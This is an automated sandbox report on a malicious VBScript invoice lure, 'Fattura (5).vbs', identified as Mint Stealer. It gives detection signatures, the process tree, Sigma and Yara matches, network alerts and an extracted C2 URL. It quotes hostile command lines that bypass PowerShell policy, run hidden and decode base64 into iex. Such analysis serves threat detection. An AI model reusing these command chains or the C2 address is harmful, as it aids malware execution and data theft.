Windows Analysis Report
Fattura (5).vbs

Overview

General Information

Sample name: Fattura (5).vbs
Analysis ID: 1557836
MD5: 6ed67d1744f343d34071c5d3a6fb3846
SHA1: 4468aa5434514007ec48cad348c8e8a882ce01c3
SHA256: 4a6fdaf2e12c9e573006a2f5bd79f1283a9f316faba45f29e413e5dcb71d0ea3
Tags: rigzuvzi3bnz3-topvbsuser-JAMESWT_MHT

Detection

Mint Stealer
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected Mint Stealer
Yara detected Powershell decode and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Deletes itself after installation
Found suspicious powershell code related to unpacking or dynamic code loading
Queries Google from non browser process on port 80
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7520 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7920 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 8080 cmdline: "C:\Windows\system32\cmd.exe" /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • powershell.exe (PID: 8096 cmdline: powershell -executionpolicy bypass -WindowStyle hidden -file "C:\Users\user\AppData\Roaming\eGsnEKfw.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
          • powershell.exe (PID: 8176 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | iex" MD5: 04029E121A0CFA5991749937DD22A1D9)
            • powershell.exe (PID: 5288 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1 MD5: 04029E121A0CFA5991749937DD22A1D9)
              • powershell.exe (PID: 5968 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -c Continue = Continue MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
{"C2 url": "http://rigzuvzi3bnz3.top/1.php?s=mints13"}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Roaming\eGsnEKfw.ps1 | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security

Source | Rule | Description | Author | Strings
00000008.00000002.2251668547.000002CF1814F000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
00000008.00000002.2252974617.000002CF19971000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
00000008.00000002.2252974617.000002CF184CF000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security
Process Memory Space: powershell.exe PID: 8096 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  Strings:
  • 0x1596a:$b2: ::FromBase64String(
  • 0x1646b:$b2: ::FromBase64String(
  • 0x182d9:$b2: ::FromBase64String(
  • 0x1b5ad:$b2: ::FromBase64String(
  • 0x1c1f1:$b2: ::FromBase64String(
  • 0x1d8cd:$b2: ::FromBase64String(
  • 0x3b2bc:$b2: ::FromBase64String(
  • 0xa60a3:$b2: ::FromBase64String(
  • 0xb1b05:$b2: ::FromBase64String(
  • 0xb268e:$b2: ::FromBase64String(
  • 0xb333a:$b2: ::FromBase64String(
  • 0xb3e7c:$b2: ::FromBase64String(
  • 0x15949:$b3: ::UTF8.GetString(
  • 0x1644a:$b3: ::UTF8.GetString(
  • 0x182b8:$b3: ::UTF8.GetString(
  • 0x1b58c:$b3: ::UTF8.GetString(
  • 0x1c1d0:$b3: ::UTF8.GetString(
  • 0x1d8ac:$b3: ::UTF8.GetString(
  • 0x3b29b:$b3: ::UTF8.GetString(
  • 0xa6082:$b3: ::UTF8.GetString(
  • 0xb1ae4:$b3: ::UTF8.GetString(
Process Memory Space: powershell.exe PID: 8176 | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security

Source | Rule | Description | Author | Strings
amsi64_8096.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi64_8176.amsi.csv | JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security
amsi64_8176.amsi.csv | JoeSecurity_MintStealer_1 | Yara detected Mint Stealer | Joe Security

                  System Summary

Source: Process started; Author: Max Altgelt (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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')) | iex", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -Wind
Source: Process started; Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -WindowStyle hidden -File C:\Users\Public\Documents\KnHlMUPBukit.ps1, CommandLine|base64offset|contains: z), Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -WindowStyle hidden -c "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ProcessId: 7520, ProcessName: wscript.exe
Source: File created; Author: Florian Roth (Nextron Systems); Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8176, TargetFilename: C:\Users\Public\Documents\KnHlMUPBukit.ps1
Source: Process started; Author: frack113; Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7520, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", ProcessId: 7920, ProcessName: powershell.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ProcessId: 7520, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Fattura (5).vbs", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7520, ParentProcessName: wscript.exe, ProcessCommandLine: powershell -executionpolicy bypass -WindowStyle hidden -c "cmd /q /cC:\Users\user\AppData\Roaming\eGsnEKfw.bat", ProcessId: 7920, ProcessName: powershell.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8176, TargetFilename: C:\Users\Public\Documents\KnHlMUPBukit.ps1
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-18T17:09:23.338238+0100 | 2057063 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 168.100.9.29 | 80 | TCP
2024-11-18T17:09:23.338238+0100 | 2858291 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 168.100.9.29 | 80 | TCP

                  AV Detection

Source: http://rigzuvzi3bnz3.top/1.php?s=mi; Avira URL Cloud: Label: malware
Source: amsi64_8176.amsi.csv; Malware Configuration Extractor: MintStealer {"C2 url": "http://rigzuvzi3bnz3.top/1.php?s=mints13"}
Source: Fattura (5).vbs; ReversingLabs: Detection: 24%
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 98.4% probability
Source: Binary string: utomation.pdb0; source: powershell.exe, 00000009.00000002.2188666275.0000024FBE243000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb; source: powershell.exe, 00000009.00000002.2218015479.0000024FD83F8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ion.pdb; source: powershell.exe, 00000009.00000002.2217492712.0000024FD817A000.00000004.00000020.00020000.00000000.sdmp

                  Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                  Networking
